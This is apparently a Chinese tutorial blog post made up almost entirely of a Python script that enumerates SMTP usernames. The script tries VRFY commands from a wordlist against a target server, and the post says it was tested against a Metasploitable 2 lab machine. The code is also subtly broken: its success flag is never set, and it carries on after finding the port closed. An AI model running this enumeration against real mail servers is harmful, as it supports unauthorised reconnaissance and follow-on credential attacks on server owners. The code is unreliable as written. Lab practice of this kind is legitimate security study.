利用Python破解SMTP服务器用户名
本代码运行以及测试环境:用Kali Linux运行Python代码,目标机器为Metasploitable 2,该目标运行SMTP服务.
1 import socket 2 import optparse 3 import os 4 import sys 5 import termcolor 6 7 class SMTPUserCrack: 8 def __init__(self) -> None: 9 self.target = self.get_params()[0] 10 self.port = self.get_params()[1] 11 self.filename = self.get_params()[2] 12 13 def get_params(self): 14 parser = optparse.OptionParser('Usage: <Program> -t server IP address -p port -f wordlist of username') 15 parser.add_option('-t', '--target', dest='target', type='string', help="Specify target IP address") 16 parser.add_option('-p', '--port', dest='port', type='int', help="Spcify smtp server port") 17 parser.add_option('-f', '--filename', dest='filename', type='string', help='Specify wordlsit') 18 options, args = parser.parse_args() 19 if options.target is None or options.filename is None: 20 print(parser.usage) 21 sys.exit(0) 22 if options.port is None: 23 options.port = 25 24 if not os.path.exists(options.filename): 25 print("[-] The file does not exit") 26 sys.exit(0) 27 return options.target, options.port, options.filename 28 29 def port_scan(self): #如果目标端口不开放,则退出 30 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 s.settimeout(2) 32 if not s.connect_ex((self.target, self.port)): 33 s.close() 34 return True 35 else: 36 s.close() 37 return False 38 39 40 def check_user(self, username): 41 try: 42 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 s.settimeout(2) 44 s.connect((self.target,self.port)) 45 recv_data = s.recv(1024) 46 command = 'VRFY %s\n' % username 47 s.send(command.encode('utf-8')) 48 response = s.recv(1024).decode('utf-8') 49 if '252' in response: #用户名不存在的时候,响应码会不一样 50 print("\t[+] SMTP User Found: \t", termcolor.colored(username,'blue')) 51 return True 52 53 except Exception as e: 54 pass 55 56 finally: 57 s.close() 58 59 def run(self): 60 if not self.port_scan(): 61 print("[-] The target has no SMTP service running over the port: %d" % self.port) 62 63 crack_flag = False 64 65 print("[-] The port is running smtp service: %d" % self.port) 66 with open(self.filename,'r') as f: 67 for line in f.readlines(): 68 username = line.strip() 69 70 res = self.check_user(username) 71 if crack_flag == True: 72 sys.exit() 73 74 if crack_flag == True: #如果遍历字典中所有的行以后,仍然没有匹配,则表明破解失败 75 print("[-] Failed to crack") 76 77 78 if __name__ == "__main__": 79 smtpuser = SMTPUserCrack() 80 smtpuser.run()
STRIVE FOR PROGRESS,NOT FOR PERFECTION